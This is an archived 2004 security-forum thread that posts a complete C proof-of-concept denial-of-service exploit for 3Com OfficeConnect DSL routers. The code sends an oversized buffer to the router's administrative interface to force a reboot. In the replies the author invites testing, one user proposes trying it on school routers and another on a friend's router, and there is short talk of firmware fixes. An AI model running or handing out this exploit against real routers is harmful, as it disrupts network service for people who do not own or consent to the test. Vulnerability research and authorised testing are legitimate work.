hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
GaLiaRePt
Feb 24 2004, 10:37 PM
3Com DSL Router Administrative Interface Long Request DoS exploit
Date: 2004-02-25

Author : Shaun Colley <shaunige@yahoo.co.uk>
Download : http://www.security-corporation.com/downlo...loit/3com-DoS.c

CODE
/* 3com-DoS.c
*
* PoC DoS exploit for 3Com OfficeConnect DSL Routers.
* discovered by David F. Madrid.
*
* Successful exploitation of the vulnerability should cause the router to
* reboot. It is not believed that arbitrary code execution is possible -

* check advisory for more information.
*
* -shaun2k2
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
if(argc < 3) {
printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <
shaunige@yahoo.co.uk>\n\n");
printf("Usage: 3comDoS < 3com_router> < port>\n");
exit(-1);
}

int sock;
char explbuf[521];
struct sockaddr_in dest;
struct hostent *he;

if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}

if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}

printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <
shaunige@yahoo.co.uk>\n\n");

dest.sin_addr = *((struct in_addr *)he->h_addr);
dest.sin_port = htons(atoi(argv[2]));
dest.sin_family = AF_INET;

printf("[+] Crafting exploit buffer.\n");
memset(explbuf, 'A', 512);
memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);

if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) ==
-1) {
perror("connect()");
exit(-1);
}

printf("[+] Connected...Sending exploit buffer!\n");
send(sock, explbuf, strlen(explbuf), 0);
sleep(2);
close(sock);
printf("\n[+] Exploit buffer sent!\n");
return(0);
}



Many some good stuff on Sec corp today :-)
shaun2k2
Feb 25 2004, 03:43 PM
Hehe, I wrote that exploit smile.gif. Please note, although I wrote the exploit for the router DoS vulnerability, I did not discover it. That was the work of David F. Madrid, as I wrote in the program comments smile.gif.

If anybody wants to test this out on their router, that would be great, as I'm curious about the exact impact. Apparently, my exploit should reboot the router.


-Shaun2k2.
zero-maitimax
Feb 26 2004, 11:30 AM
well i wanne trai it... we have 3com at school so...

but i'm not so happy with dos exploits...
shaun2k2
Feb 26 2004, 04:18 PM
Hmm, trying that at school could get you kicked out...you don't want to try that at school, it might cost you your placement. Just to be safe, "I do not take responsibility for this code".

Well, you might not like DoS exploits so much, but administrators responsible for this brand of router may wish to test the vulnerability. Remote code execution is not possible via this vulnerability...


-Shaun.
Axl
Mar 2 2004, 04:53 PM
QUOTE (shaun2k2 @ Feb 26 2004, 04:18 PM)
Hmm, trying that at school could get you kicked out...you don't want to try that at school, it might cost you your placement. Just to be safe, "I do not take responsibility for this code".

Well, you might not like DoS exploits so much, but administrators responsible for this brand of router may wish to test the vulnerability. Remote code execution is not possible via this vulnerability...


-Shaun.

well no shit sherlock... I mean (filtered) it's a damn router not software... Although, hmm it perhaps could be possible to change the router firmware and stuff to log outgoing data and shit...
R0x0r
Mar 2 2004, 05:01 PM
One of my freinds have that router.. I'll try it out.. Is there any patch or something to fix that hole?
Axl
Mar 2 2004, 11:38 PM
QUOTE (R0x0r @ Mar 2 2004, 05:01 PM)
One of my freinds have that router.. I'll try it out.. Is there any patch or something to fix that hole?

Well evidently it isn't as easy as releasing a simple patch. I reckon that you will need to flush the firmware in order to fix this vulnerability... 3com should be doing that soon. Your isp can update your firmware though as soon as they obtain the updated firmware package. Or, of course, you can do it yourself biggrin.gif
alkausar
Mar 3 2004, 03:52 AM
Dos exploit... hegggghhhhh blink.gif blink.gif
shaun2k2
Mar 3 2004, 04:02 PM
QUOTE

well no shit sherlock... I mean (filtered) it's a damn router not software... Although, hmm it perhaps could be possible to change the router firmware and stuff to log outgoing data and shit...

What the (filtered) are you talking about? I don't understand why you quoted my post. Care to explain?


-Shaun.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.